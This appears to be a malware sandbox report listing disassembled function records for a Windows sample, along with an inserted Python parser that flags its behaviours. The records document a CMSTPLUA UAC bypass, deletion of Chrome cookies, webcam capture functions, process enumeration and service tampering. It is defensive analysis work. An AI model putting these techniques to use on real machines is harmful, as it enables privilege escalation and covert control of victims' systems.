                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: 19793b4b6baa09b5fac30a83039e1f9c1b1fc09f5707b87a30c95e6118fc2717
                                                          • Instruction ID: 781c03a50f1c813746d4e14bf3c61566c92396d5579059589c4d950ed669b936
                                                          • Opcode Fuzzy Hash: 19793b4b6baa09b5fac30a83039e1f9c1b1fc09f5707b87a30c95e6118fc2717
                                                          • Instruction Fuzzy Hash: 6551C474E002499FDB10CFA8D845AEEBBF4EF09300F14412BE955E7291E774A951CB6A
                                                          APIs
                                                          • ExitThread.KERNEL32 ref: 004017F4
                                                            • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                            • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401902
                                                            • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                          • __Init_thread_footer.LIBCMT ref: 004017BC
                                                            • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                            • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                          • String ID: XMG$NG$NG
                                                          • API String ID: 1596592924-1283814050
                                                          • Opcode ID: 9c93778598743552ca7cf549f7c264060170741c6fea158e9adbc4e2dfda7b39
                                                          • Instruction ID: a5e0bc9ac4bbc073a85812dd1d3adb1d2a3c84d0b98f0a89840e4e641ba94373
                                                          • Opcode Fuzzy Hash: 9c93778598743552ca7cf549f7c264060170741c6fea158e9adbc4e2dfda7b39
                                                          • Instruction Fuzzy Hash: 5341B4712042008BC329FB65DD96AAE7395EB94318F10453FF54AA31F2DF389986CB5E
                                                          APIs
                                                            • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                            • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E799
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E7BD
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E7CC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E983
                                                            • Part of subcall function 0041B392: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E5A8,00000000,?,?,004750FC), ref: 0041B3A7
                                                            • Part of subcall function 0041B392: IsWow64Process.KERNEL32(00000000,?,?,?,004750FC), ref: 0041B3B2
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E974
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                          • String ID: `wF
                                                          • API String ID: 2180151492-1213667750
                                                          • Opcode ID: 9dc562cd00f3f50bc6e2eada1fc9f3fa230e0bea5391e794d91a9c4d3f2fe10f
                                                          • Instruction ID: eccf11dc20c1a31a83cdfd33956dcb3d749eb3f266b118f2c15681f5292a9231
                                                          • Opcode Fuzzy Hash: 9dc562cd00f3f50bc6e2eada1fc9f3fa230e0bea5391e794d91a9c4d3f2fe10f
                                                          • Instruction Fuzzy Hash: F741CF311083455BC225FB61D891AEFB7E5AFA4304F50453EF849531E1EF389A49C65A
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437CBB
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00437CC3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437D51
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00437D7C
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437DD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: e20e4e91601e7da6f84b85b393d4409c90c36ea595a33a74ae9b4edf16c34eae
                                                          • Instruction ID: 1103995f59bc857a00dd0af833384e4a9f5f4a2e3f3cb1d3a3c35a3a433dd29e
                                                          • Opcode Fuzzy Hash: e20e4e91601e7da6f84b85b393d4409c90c36ea595a33a74ae9b4edf16c34eae
                                                          • Instruction Fuzzy Hash: 4E410674A042099BCF20DF29C844AAE7BA5AF4C328F14905AEC55AB392D739DD45CF98
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfbae8f3dcd2e5f3bdf3bcee8d3106cebccc1d81cd58107c476234e6777acd1f
                                                          • Instruction ID: 890753aa9dfb888b2a1585f98a5e225511b13b718af609ae416a1884f745cca0
                                                          • Opcode Fuzzy Hash: cfbae8f3dcd2e5f3bdf3bcee8d3106cebccc1d81cd58107c476234e6777acd1f
                                                          • Instruction Fuzzy Hash: 3A112472504A15BFDB206F729C08D3B3AACEB82736F20016EFC15D7282DE38C800C669
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FCD4
                                                          • int.LIBCPMT ref: 0040FCE7
                                                            • Part of subcall function 0040CFB3: std::_Lockit::_Lockit.LIBCPMT ref: 0040CFC4
                                                            • Part of subcall function 0040CFB3: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CFDE
                                                          • std::_Facet_Register.LIBCPMT ref: 0040FD23
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FD49
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FD65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: xkG
                                                          • API String ID: 2536120697-3406988965
                                                          • Opcode ID: 4b6f72b1e0d08092fd2688f9826419a51511b3482868562e895aff95ac9ad519
                                                          • Instruction ID: 7cf641d0f45d7e480cf6c67891cb53e845b1d2cd586d61112ae60f6436568b55
                                                          • Opcode Fuzzy Hash: 4b6f72b1e0d08092fd2688f9826419a51511b3482868562e895aff95ac9ad519
                                                          • Instruction Fuzzy Hash: 3B11F032900119A7CB14FBA5D8429DEB7689E55358F10013BF809B72D1EB3CAF49C7D9
                                                          APIs
                                                            • Part of subcall function 0044FC32: _free.LIBCMT ref: 0044FC5B
                                                          • _free.LIBCMT ref: 0044FF39
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 0044FF44
                                                          • _free.LIBCMT ref: 0044FF4F
                                                          • _free.LIBCMT ref: 0044FFA3
                                                          • _free.LIBCMT ref: 0044FFAE
                                                          • _free.LIBCMT ref: 0044FFB9
                                                          • _free.LIBCMT ref: 0044FFC4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction ID: 7d3bb130547cbd64d3bc6acdbb054c191a8682768e3bc5df2cfa43195c7f437f
                                                          • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction Fuzzy Hash: 3611603158175CAAE930B7B2CC87FCB779CFF01744F804C2EB69B66052DA2CB90A5655
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe), ref: 00406835
                                                            • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                            • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004669B0,00000000), ref: 004067E9
                                                          • CoUninitialize.OLE32 ref: 0040688E
                                                          Strings
                                                          • [+] before ShellExec, xrefs: 00406856
                                                          • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                                                          • C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
                                                          • [+] ShellExec success, xrefs: 00406873
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-3044081716
                                                          • Opcode ID: f62f8ea22737c4132ff5b3dac93a03cf3a5d885852b0606909ed978fbfad8032
                                                          • Instruction ID: bf5204b976fdd256b066cceb308157ad377b3c08e3874fea13dbf5f4dff6080c
                                                          • Opcode Fuzzy Hash: f62f8ea22737c4132ff5b3dac93a03cf3a5d885852b0606909ed978fbfad8032
                                                          • Instruction Fuzzy Hash: F20180722023117FE2287B21DC0EF7B6658DB4176AF12413FF946A71C1EAA9AC014679
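                                                           Added triage example (not Joe Sandbox code and not part of the original report): a small Python parser for the APIs / Strings lines of the function records in this section, plus two heuristics over the parsed calls. The first covers the record directly above: CoGetObject.OLE32 called with a 0x24-byte bind-options block (0x24 is sizeof(BIND_OPTS3) on 32-bit Windows, the structure a COM elevation moniker bind needs) next to the UACMe marker string "[+] ucmCMLuaUtilShellExecMethod" is what the "Contains functionality to bypass UAC (CMSTPLUA)" signature in the overview rests on. The second covers the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW / OpenProcess / IsWow64Process record earlier in this section. The two sample records are copied from those records; the finding names, the rule logic and the Record / ApiCall types are my own assumptions.

```python
"""Parse the per-function API/String records of this report and flag the
behaviours they document.  Added example, not Joe Sandbox code; the finding
names and rule logic are my own assumptions."""
import re
from dataclasses import dataclass, field
from typing import Optional

# API line: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE,
# optional "(args)", then "ref: XXXXXXXX" (the call-site address).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# String line: "text, xrefs: XXXXXXXX[, XXXXXXXX ...]".
STR_RE = re.compile(
    r"^\s*•\s*(?P<text>.*?),\s*xrefs:\s*(?P<xrefs>[0-9A-F]{8}(?:,\s*[0-9A-F]{8})*)\s*$"
)
SECTION_END = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
PROCESS_ACCESS = {0x400: "PROCESS_QUERY_INFORMATION",          # Win32 access masks seen
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}  # in the OpenProcess calls

@dataclass
class ApiCall:
    name: str
    module: str
    args: list             # raw argument values as printed ("?" = unknown)
    ref: str               # call-site address
    caller: Optional[str]  # set when the call sits in a subcall of the function

@dataclass
class Record:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, [xref addresses])

def parse_record(text: str) -> Record:
    """'APIs' / 'Strings' open a section; the template headers in SECTION_END close it."""
    rec, section = Record(), None
    for line in text.splitlines():
        head = line.strip()
        if head in ("APIs", "Strings"):
            section = head
        elif head in SECTION_END:
            section = None
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            rec.strings.append((m["text"], m["xrefs"].replace(" ", "").split(",")))
    return rec

def has_api(rec: Record, name: str, module: Optional[str] = None) -> bool:
    return any(c.name == name and module in (None, c.module) for c in rec.apis)

def open_process_rights(rec: Record) -> list:
    """Decode dwDesiredAccess of every OpenProcess call in the record."""
    rights = set()
    for c in rec.apis:
        if c.name == "OpenProcess" and c.args and re.fullmatch(r"[0-9A-F]{8}", c.args[0]):
            rights.add(PROCESS_ACCESS.get(int(c.args[0], 16), c.args[0]))
    return sorted(rights)

def triage(rec: Record) -> list:
    findings = []
    # CoGetObject binds a moniker; next to the UACMe marker for the CMLuaUtil
    # ShellExec method it matches the report's "bypass UAC (CMSTPLUA)" signature.
    if has_api(rec, "CoGetObject", "OLE32") and any(
            "ucmCMLuaUtilShellExecMethod" in s for s, _ in rec.strings):
        findings.append("uac-bypass-cmluautil")
    # CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS = 0x2) + Process32First/NextW is a
    # process walk; OpenProcess + IsWow64Process means each entry is opened and probed.
    snap = any(c.name == "CreateToolhelp32Snapshot" and c.args[:1] == ["00000002"]
               for c in rec.apis)
    if snap and has_api(rec, "Process32FirstW") and has_api(rec, "Process32NextW"):
        findings.append("process-enumeration")
        if has_api(rec, "OpenProcess") and has_api(rec, "IsWow64Process"):
            findings.append("per-process-bitness-probe")
    return findings

# Sample input: API/String lines copied from the two function records in this report.
UAC_RECORD = r"""APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe), ref: 00406835
  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004669B0,00000000), ref: 004067E9
• CoUninitialize.OLE32 ref: 0040688E
Strings
• [+] before ShellExec, xrefs: 00406856
• [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
• [+] ShellExec success, xrefs: 00406873
Memory Dump Source
"""
PROC_RECORD = r"""APIs
  • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E799
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E7BD
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E7CC
  • Part of subcall function 0041B392: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E5A8,00000000,?,?,004750FC), ref: 0041B3A7
  • Part of subcall function 0041B588: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
Strings
Memory Dump Source
"""

if __name__ == "__main__":
    for label, text in (("uac", UAC_RECORD), ("procwalk", PROC_RECORD)):
        rec = parse_record(text)
        print(label, [c.name for c in rec.apis], triage(rec), open_process_rights(rec))
```

                                                           Running the block prints the parsed API names, the findings and the decoded OpenProcess access masks for both records. Any other record from this section can be pasted in unchanged: the parser only reads the APIs and Strings sections and stops at the Memory Dump Source, Yara matches and Similarity template lines, so the per-record hashes and dump references are ignored.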
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FFB7
                                                          • int.LIBCPMT ref: 0040FFCA
                                                            • Part of subcall function 0040CFB3: std::_Lockit::_Lockit.LIBCPMT ref: 0040CFC4
                                                            • Part of subcall function 0040CFB3: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CFDE
                                                          • std::_Facet_Register.LIBCPMT ref: 00410006
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0041002C
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410048
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: pmG
                                                          • API String ID: 2536120697-2472243355
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                          • GetLastError.KERNEL32 ref: 0040B2EE
                                                          Strings
                                                          • UserProfile, xrefs: 0040B2B4
                                                          • [Chrome Cookies not found], xrefs: 0040B308
                                                          • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          APIs
                                                          • __allrem.LIBCMT ref: 00439999
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004399B5
                                                          • __allrem.LIBCMT ref: 004399CC
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004399EA
                                                          • __allrem.LIBCMT ref: 00439A01
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00439A1F
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          APIs
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                            • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                          • API String ID: 3469354165-3054508432
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 00419FF2
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A006
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A013
                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,004196FD), ref: 0041A048
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A05A
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A05D
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                          • String ID:
                                                          • API String ID: 493672254-0
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043800D,004379C1), ref: 00438024
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438032
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043804B
                                                          • SetLastError.KERNEL32(00000000,?,0043800D,004379C1), ref: 0043809D
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                          • _free.LIBCMT ref: 00447106
                                                          • _free.LIBCMT ref: 0044712E
                                                          • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                          • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                          • _abort.LIBCMT ref: 0044714D
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E25
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E39
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E46
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E55
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E67
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E6A
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419F8C
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FA0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FAD
                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FBC
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FCE
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FD1
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F27
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F3B
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F48
                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F57
